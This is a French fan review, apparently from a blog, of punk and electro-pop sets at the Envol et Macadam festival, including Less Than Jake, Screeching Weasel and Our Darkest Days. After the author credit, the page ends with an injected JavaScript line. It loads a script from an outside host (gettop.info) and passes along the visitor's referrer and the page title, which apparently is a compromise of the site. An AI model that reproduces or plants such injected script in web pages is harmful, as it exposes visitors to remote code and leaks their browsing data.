Ma tournée se poursuit sur les scènes de ce merveilleux festival.

Me voici donc devant Goodbye Sailor!  Cinq membres de ce groupe dont Sandra Sandoval, jeune mexicaine claviériste, ont su mettre au monde ce petit band en 2011. Cette jeune dame donne un autre style et un charme certain à son band. Musicalement, je qualifie ce groupe comme un band électro pop, punk….ou comme dans mon langage, c’est du beat Électro-Ground dansant ! Les cinq membres de ce groupe nous amènent autant à transmettre la musique qu’au désir de danser. Musique donc très entraînante;  les amateurs du festival se rapprochent de la scène avec le petit swing dansant …Par contre, sur certaines chansons, quelques longueurs musicales. Si l’envie de tomber en transe te vient avec son œuvre peindre des toiles sera tout-à-fait approprié……ou pour un bon trip de….. La phrase est écrite, tu choisis le reste.

On y va maintenant pour un des grands coups de la soirée !!! LEST THAN JAKE !!! OH! OUI Madame, Monsieur !!! À mon goût, le show n’a pas duré assez longtemps.  Dommage… À son entrée sur scène, une foule fait son entrée sur la scène rock 100.9 !!! Ce fabuleux band Américain qui a pris naissance il y a de ça déjà 20 ans ont su réveiller la foule punk rock avec de merveilleux classique dont : Look What Happened J’approuve que la bande a réussi à rester depuis si longtemps et toujours encore fidèle à elle-même… Un groupe obsédé par une interaction avec ses fans! Ils savent se faire encore et toujours découvrir par la nouvelle relève punk rock autant que de réanimer la punkerie en nous, devenus maintenant adultes.

POUR LES NOUVEAUX GROUPES À DECOUVRIR ET POUR NOUS AUTRES, LES VIEUX,,, CONTINUONS A SUIVRE LEUR PARCOUR MUSICAL.

Je vous aime Lest than jake !!! xxxx La deuxième tête d’affiche de notre fameux vendredi soir était screeshing weasel!! OH!  que oui !!!! La foule est solidement en feu !!! Rien n’est à leur épreuve. Screeshing weasel a été fondé en 1986 !!  C’est du vrai bon punk rock malgré leur âge (toujours aussi sexy) hahaha! L’énergie sur la scène musicale est à son meilleure ! Dans le ‘’pit’’’ eh! que ça bouge! Les femmes sont en délire ! Notre chanteur Ben Weasel garde autant une interaction avec son public « live » qu’avec ses fans Twitter Instagram et Facebook en prenant quelques selfies.  Merci Screesching Weasel pour votre magnifique prestation et de nous faire vivre une pellicule de souvenirs qui a su défiler dans notre tête tout au long de votre spectacle.

Samedi le 6 septembre, dernière journée pour Envol et Macadam. Nous sommes chanceux …la pluie et le temps gris de l’avant-midi sont discrètement disparus pour laisser entrer la chaleur du soleil faisant son apparition avec autant de rayons que le band ….

La découverte de l’année ! Voilà je présente le band qui depuis ce jour fais rayonner mon âme. Our darkest days !!! C’est un merveilleux band de Québec aux allures punk holschool hardcore mélodique …. AVEC UNE PROFONDEUR HYPNOTISANTE …PAS JUSTE QUAND ON REGARDE VINCENT FOURNIER LE CHANTEUR … (charmant jeune homme)!!! avec toute la profondeur des musiciens et des écrits ???…Sur scène ils donnent une prestation remarquable avec une énergie hors du commun.  On remarque que les 5 membres du groupe sont solidement fusionnés. L’ambiance du décor 100.9 est très positive ….les spectateurs et spectatrices sont éblouis par leur performance. Pour ceux et celles qui n’avaient jamais eu la chance d’entendre leur musique c’est garanti que depuis le 6 septembre ces punks ont adhéré à suivre Our darkest days …pour les connaisseurs de ce band, rien de plus beau que de les voir sur scène… Eh! oui …je suis une groupie, une fan finie. Je les encourage à poursuivre leur passion… c’est une belle mission qu’ils ont de nous amener dans leur univers musical. Our darkest day sont présentement en plein enregistrement pour quelques nouvelles chansons…dont une que nous avons eu la chance d’entendre a Envol et Macadam parlant de l’être humain pris avec des maladies mentales comme l’Alzheimer et la dépression. Vous faites du beau travaille les gars ! I love you.

Texte: Valérie St-Cyr

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;